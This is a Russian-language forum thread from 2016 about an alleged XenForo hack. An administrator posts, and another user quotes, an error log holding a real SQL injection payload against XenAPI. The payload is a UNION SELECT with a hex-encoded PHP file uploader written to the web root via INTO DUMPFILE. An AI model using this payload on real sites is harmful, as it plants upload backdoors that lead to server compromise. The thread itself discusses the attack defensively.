Взлом хенфоро

dmsm78 · 21 Июн 2016

Кто прокомментирует граммотно? Бред или как защититься?

mexan · 21 Июн 2016

dmsm78, меньше на таких форумах лазить надо.

Smalesh · 21 Июн 2016

mygedz написал(а):
dmsm78, меньше на таких форумах лазить надо.

А толку. Xenforo действительно (на удивление) передает пароль в открытом виде. И пароль может перехватить как нечистоплотный админ, так и какир любым удобным способом.

Len · 21 Июн 2016

что такое "хенфоро"?

water-lord · 21 Июн 2016

Не знаю какое там содержимое, но в последнем апдейте ксенфоро, без внесения пользовательских правок - БД сайта уязвима.
Мою слили, скинули мне, я отписал администрации этого форума, в частности Хопу - меня проигнорировали, так что, будьте аккуратнее

Captain · 21 Июн 2016

water-lord, ну если руки из одного места то да

water-lord · 21 Июн 2016

Captain написал(а):
water-lord, ну если руки из одного места то да

какая разница с какого места руки? Залить файлы на ФТП можно только одним способом, какие бы руки не были

Captain написал(а):
water-lord, ну если руки из одного места то да

Говорю за себя и нормальных людей, про тебя не знаю, может ты каждый файл редактируешь, меняешь все переменные и потом заливаешь по одному файлу

Kolya groza morey · 21 Июн 2016

Ну если шелл на сайт закинут тогда взломают, а если нет тогда ничего боятся

water-lord · 21 Июн 2016

Kolya groza morey написал(а):
Ну если шелл на сайт закинут тогда взломают, а если нет тогда ничего боятся

Никакого шелла. Есть уязвимость с некоторыми символами, она используется

Zend_Db_Statement_Mysqli_Exception: Mysqli prepare error: Access denied for user 'user2983'@'localhost' (using password: YES) - library/Zend/Db/Statement/Mysqli.php:77
Сгенерирована пользователем: Неизвестная учётная запись, Вчера, в 22:41
Трассировка стэка
#0 /var/www/ensage-forum/data/www/ensage-forum.ru/library/Zend/Db/Statement.php(115): Zend_Db_Statement_Mysqli->_prepare('SELECT * FROM `...')
#1 /var/www/ensage-forum/data/www/ensage-forum.ru/library/Zend/Db/Adapter/Mysqli.php(381): Zend_Db_Statement->__construct(Object(Zend_Db_Adapter_Mysqli), 'SELECT * FROM `...')
#2 /var/www/ensage-forum/data/www/ensage-forum.ru/library/Zend/Db/Adapter/Abstract.php(478): Zend_Db_Adapter_Mysqli->prepare('SELECT * FROM `...')
#3 /var/www/ensage-forum/data/www/ensage-forum.ru/library/Zend/Db/Adapter/Abstract.php(753): Zend_Db_Adapter_Abstract->query('SELECT * FROM `...', Array)
#4 /var/www/ensage-forum/data/www/ensage-forum.ru/api.php(4160): Zend_Db_Adapter_Abstract->fetchRow('SELECT * FROM `...')
#5 /var/www/ensage-forum/data/www/ensage-forum.ru/api.php(1914): XenAPI->getGroup('-6414' UNION AL...')
#6 /var/www/ensage-forum/data/www/ensage-forum.ru/api.php(56): RestAPI->processRequest()
#7 {main}
Содержимое запроса
array(3) {
["url"] => string(1637) "

У Вас недостаточно прав для просмотра ссылок. Вход или Регистрация

"
["_GET"] => array(2) {
["action"] => string(8) "getGroup"
["value"] => string(1531) "-6414' UNION ALL SELECT 0x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d2f7372762f7777772f3e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL INTO DUMPFILE '/srv/www/tmpupdxv.php'-- GCLS"
}
["_POST"] => array(0) {
}

Данные логи с админки похожи на шелл доступ?

Kolya groza morey · 21 Июн 2016

water-lord написал(а):
Данные логи с админки похожи на шелл доступ?

Я не про логи, а про то что написано в первом сообщении, хотя я и в логах удачной попытки взлома не увидел

Mirovinger · 21 Июн 2016

water-lord написал(а):
Не знаю какое там содержимое, но в последнем апдейте ксенфоро, без внесения пользовательских правок - БД сайта уязвима.
Мою слили, скинули мне, я отписал администрации этого форума, в частности Хопу - меня проигнорировали, так что, будьте аккуратнее

Стоп, а мы тут при каких делах, да и каким таким образом, с последним обновлением, вдруг уязвимость появилась.

water-lord написал(а):
Никакого шелла. Есть уязвимость с некоторыми символами, она используется

Zend_Db_Statement_Mysqli_Exception: Mysqli prepare error: Access denied for user 'user2983'@'localhost' (using password: YES) - library/Zend/Db/Statement/Mysqli.php:77
Сгенерирована пользователем: Неизвестная учётная запись, Вчера, в 22:41
Трассировка стэка
#0 /var/www/ensage-forum/data/www/ensage-forum.ru/library/Zend/Db/Statement.php(115): Zend_Db_Statement_Mysqli->_prepare('SELECT * FROM `...')
#1 /var/www/ensage-forum/data/www/ensage-forum.ru/library/Zend/Db/Adapter/Mysqli.php(381): Zend_Db_Statement->__construct(Object(Zend_Db_Adapter_Mysqli), 'SELECT * FROM `...')
#2 /var/www/ensage-forum/data/www/ensage-forum.ru/library/Zend/Db/Adapter/Abstract.php(478): Zend_Db_Adapter_Mysqli->prepare('SELECT * FROM `...')
#3 /var/www/ensage-forum/data/www/ensage-forum.ru/library/Zend/Db/Adapter/Abstract.php(753): Zend_Db_Adapter_Abstract->query('SELECT * FROM `...', Array)
#4 /var/www/ensage-forum/data/www/ensage-forum.ru/api.php(4160): Zend_Db_Adapter_Abstract->fetchRow('SELECT * FROM `...')
#5 /var/www/ensage-forum/data/www/ensage-forum.ru/api.php(1914): XenAPI->getGroup('-6414' UNION AL...')
#6 /var/www/ensage-forum/data/www/ensage-forum.ru/api.php(56): RestAPI->processRequest()
#7 {main}
Содержимое запроса
array(3) {
["url"] => string(1637) "
У Вас недостаточно прав для просмотра ссылок. Вход или Регистрация
"
["_GET"] => array(2) {
["action"] => string(8) "getGroup"
["value"] => string(1531) "-6414' UNION ALL SELECT 0x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d2f7372762f7777772f3e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL INTO DUMPFILE '/srv/www/tmpupdxv.php'-- GCLS"
}
["_POST"] => array(0) {
}

Данные логи с админки похожи на шелл доступ?

Судя по этому посту, двиг тут не виноват, Вы что-то из уязвимого используете, похоже на интеграцию XenAPI, а она как раз была обновлена, так как была найдена sql уязвимость -

У Вас недостаточно прав для просмотра ссылок. Вход или Регистрация

.
XenAPI - XenForo PHP REST API
И сколько помню, причину Вы искали в XenCore, а вот таких логов не показывали.

dreyti · 21 Июн 2016

На хорошем хостинге эта дырка не страшна. На дешевом вполне сканает. Ксен можно слить куда более красивым и менее гемморойным методом. А вообще ограничивайте аттачи пользователей в сообщениях до картинок. А картинки просто переконвертируйте плагином каким и ложите на хост переконвертированную картинку) И шеллы Вам будут нестрашны.

PS: Не используйте миллион нуленных плагинов! Как правило в них всегда есть закладки и дыры через которые их слили))))

Hope · 21 Июн 2016

Опять какиры бушуют. :facepalm:

У них каждый час что-то взламывают и т.п. Такие темы сразу в мусор нужно отправлять.

Взлом хенфоро

dmsm78

mexan

Smalesh

Len

water-lord

Captain

Какие бекапы? О_о

water-lord

Kolya groza morey

water-lord

Kolya groza morey

Mirovinger

dreyti

Hope

Мы ценим вашу конфиденциальность